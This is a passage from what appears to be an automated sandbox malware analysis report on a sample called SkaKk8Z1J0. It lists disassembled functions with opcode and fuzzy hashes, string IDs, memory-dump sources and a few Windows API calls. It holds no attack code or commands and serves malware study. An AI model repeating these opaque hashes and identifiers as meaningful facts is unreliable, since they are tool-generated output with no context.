                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                                                                                                                                                                                                                  Function 0076C8B1 Relevance: 7.8, Strings: 6, Instructions: 346COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                  • API String ID: 0-3264166258
                                                                                                                                                                                                                                                  • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                  • Instruction ID: f9fc204719f6dd0cc2011bf20d462234022bd44376470bf6352984b09525ca71
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69B1E87120C3818BE325CF29C4917BBBBD2AFD2314F18CA6DD4DA8B291DB788549D712
                                                                                                                                                                                                                                                  Function 0042C64A Relevance: 7.8, Strings: 6, Instructions: 346COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                  • API String ID: 0-3264166258
                                                                                                                                                                                                                                                  • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                  • Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                  Function 007489F7 Relevance: 7.6, APIs: 5, Instructions: 146threadCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 00748A1B
                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00748A25
                                                                                                                                                                                                                                                  • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00748AC2
                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00748AD7
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00748BD9
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4063528623-0
                                                                                                                                                                                                                                                  • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                  • Instruction ID: 293552266f22b0cb3d85f442557ea713baa418553297e243a8bfa272203d0df7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA417E77F443184BD71CAE748C9A36EB6D69BC4314F0A803E6985AB390DEBC9C0592D1
                                                                                                                                                                                                                                                  Function 00422E93 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 394COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: )*$X9{;$r1B
                                                                                                                                                                                                                                                  • API String ID: 0-1001561910
                                                                                                                                                                                                                                                  • Opcode ID: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                  • Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A
                                                                                                                                                                                                                                                  Function 0041BEA0 Relevance: 6.9, Strings: 5, Instructions: 684COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: -$C\$Iz$[^$de
                                                                                                                                                                                                                                                  • API String ID: 0-3020956940
                                                                                                                                                                                                                                                  • Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                  • Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
                                                                                                                                                                                                                                                  Function 00760817 Relevance: 6.7, Strings: 5, Instructions: 481COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &'$0c=e$2g1i$<k;m$wy
                                                                                                                                                                                                                                                  • API String ID: 0-3335612808
                                                                                                                                                                                                                                                  • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                  • Instruction ID: 4fbec2de0e85b10715bc40f14ff2831b88f075c909c40f5969b7be418aaef2e4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59D1E7B56183018BD724DF25CC5176BB7F2EF92354F18996CE8828B394E77D9801C792
                                                                                                                                                                                                                                                  Function 0076C94B Relevance: 6.6, Strings: 5, Instructions: 336COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                  • API String ID: 0-923305466
                                                                                                                                                                                                                                                  • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                  • Instruction ID: d0bb8b81a9e21665a235362e539df92b52ee2ec0d2fd9d99bb1ca4f900481d53
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DA1FA7120C3818BE365CF2984917BBBBD2AFD2304F18C96DD4DA8B291DB788549C717
                                                                                                                                                                                                                                                  Function 0042C6E4 Relevance: 6.6, Strings: 5, Instructions: 336COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                  • API String ID: 0-923305466
                                                                                                                                                                                                                                                  • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                  • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
                                                                                                                                                                                                                                                  Function 0076C99C Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                  • API String ID: 0-923305466
                                                                                                                                                                                                                                                  • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                  • Instruction ID: 56f54958b1601c95825d7b279e81cdbde5cbce1aac6999e176873ebd13a45783
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10A1FB7020C3818BE365CF29C4917BBBBD2AFD2304F18CA6DD4DA8B291DB788549C756
                                                                                                                                                                                                                                                  Function 0042C735 Relevance: 6.6, Strings: 5, Instructions: 335COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                  • API String ID: 0-923305466
                                                                                                                                                                                                                                                  • Opcode ID: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                  • Instruction ID: a1affb31d16800ef8c6cc435bb9674081fedb8b39f933f67ef20babcac88fb25
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5eea70b87afb6f6764b4b0a803c2ee816a1ddf72bf9f3ac6a73094afb86f43b5
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6BA1097020C3918AE324CF2994D17AFBBD2AFD2304F688A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                  Function 0076C98D Relevance: 6.6, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                  • API String ID: 0-923305466
                                                                                                                                                                                                                                                  • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                  • Instruction ID: 281b6aa280c7cf49280f9a3ce5bf6d3c1a35cd880c291bcd2787979f151a638b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1FA1D87120C3818ED325CF2984917BBBBD2AFD2304F288A6DD4DA8B291DB788549C757
                                                                                                                                                                                                                                                  Function 0042C726 Relevance: 6.6, Strings: 5, Instructions: 312COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                  • API String ID: 0-923305466
                                                                                                                                                                                                                                                  • Opcode ID: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                  • Instruction ID: 9bb2126ccc093d793a191dd69b681400b401b97b3b24328c9194ba10bd873eb8
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 964c76fda7f37207e59e987132c18f71186e6d03fd2999a299809d292455ad42
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16A1077120C3918AD324CF2994917BBBBD2AFD2304F688A5ED4C98B391DB788449C757
                                                                                                                                                                                                                                                  Function 00415298 Relevance: 6.1, Strings: 4, Instructions: 1123COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: in~x$kmbj$ydij$Z\
                                                                                                                                                                                                                                                  • API String ID: 0-979945983
                                                                                                                                                                                                                                                  • Opcode ID: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                  • Instruction ID: a7131c4719c006be066284edc26e6de5161f51a5f0bff666fc31d9b99828dd7c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 005fc1fa79f283313d18ab5bef71a17aafbda1228e7aae7fdcae809975c54514
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 107249B5600701CFD7248F28D8817A7B7B2FF96314F18856EE4968B392E739E842CB55
                                                                                                                                                                                                                                                  Function 0075E1E7 Relevance: 5.9, Strings: 4, Instructions: 864COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                  • API String ID: 0-3432275560
                                                                                                                                                                                                                                                  • Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                  • Instruction ID: 8bfd2e157f31017551ce9060515dedcb59962a95b580c7c479e91d437cca97a9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD42497150C3808FC729DF28C8507AEBBE1AF96315F08866DECE54B392D7799A09C752
                                                                                                                                                                                                                                                  Function 0041DF80 Relevance: 5.9, Strings: 4, Instructions: 864COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: &-$)R_X$[O_[$zusR
                                                                                                                                                                                                                                                  • API String ID: 0-3432275560
                                                                                                                                                                                                                                                  • Opcode ID: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                  • Instruction ID: 5890859bd03ddd88b235fb657101ddbf2934de1c8c3864215f367d42e94b454c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c1e88994ed028f5b04327f1d1436afa90b67df79647b043f1f73d1dc9718978
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD42683850C3908FC725DF29C8507AFBBE1AF96314F08466EE8E44B392D7398945C79A
                                                                                                                                                                                                                                                  Function 0076B75E Relevance: 5.5, Strings: 4, Instructions: 523COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                  • API String ID: 0-261129489
                                                                                                                                                                                                                                                  • Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                  • Instruction ID: 972518c6d8793826b2eba7d740b3b4441131a1da443e6a7451c20b7d233f832c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 84E1067121D3C18AE725CF29C4517BABBD2EF93304F18896DD4CACB292DB39854AC752
                                                                                                                                                                                                                                                  Function 0042B4F7 Relevance: 5.5, Strings: 4, Instructions: 523COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                  • API String ID: 0-261129489
                                                                                                                                                                                                                                                  • Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                  • Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
                                                                                                                                                                                                                                                  Function 0076B763 Relevance: 5.5, Strings: 4, Instructions: 519COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1725073480.0000000000740000.00000040.00001000.00020000.00000000.sdmp, Offset: 00740000, based on PE: false
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_740000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                  • API String ID: 0-261129489
                                                                                                                                                                                                                                                  • Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                  • Instruction ID: 85036d261540e62ea9f4c18b032943e49c4a1e897194f65867b741d4369a9ae7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6E1B27151C3C18AE7758F25C4607BABBD6AFD3304F1888ADC5CA8B292DB39454ACB12
                                                                                                                                                                                                                                                  Function 0042B4FC Relevance: 5.5, Strings: 4, Instructions: 519COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                  • API String ID: 0-261129489
                                                                                                                                                                                                                                                  • Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                  • Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56
                                                                                                                                                                                                                                                  Function 00418578 Relevance: 5.5, Strings: 4, Instructions: 455COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1724835535.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1724835535.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SkaKk8Z1J0.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                                                                                                                                                  • API String ID: 0-2418547040
